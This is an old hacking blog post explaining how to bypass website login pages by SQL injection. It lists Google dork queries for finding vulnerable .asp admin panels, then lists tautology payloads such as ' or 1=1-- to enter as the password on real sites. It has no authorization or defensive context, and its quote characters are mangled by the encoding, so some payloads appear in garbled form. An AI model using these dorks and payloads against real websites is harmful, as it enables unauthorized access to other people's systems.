Thursday, 26 September 2013

0

How to by pass WEBSITE login by sql injection

hai dudes,
today im gonna tell you how to bypass website login by SQL injection
How to Bypass Website Logins by SQL Injection

These are the Dorks Used to Find Vulnerable Site to Bypass LoginWhich are Most Commonly the .asp One.
Search them in Google without Quoutes

“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp

There are More Dorkseven
Now Go to Admin Panel and Type Admin as Username(Common One)
and in Password we Type Our SQLInjection

Here is a list of sql injections.

‘ or ’1'=’1
‘ or ‘x’=’x
‘ or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1'

TYPE ANY ONE OF THESE IN PASSWORD SPACE… There are many more but these are the best ones that i know.

**NOTE not all sites are vulnerable.**

0 comments: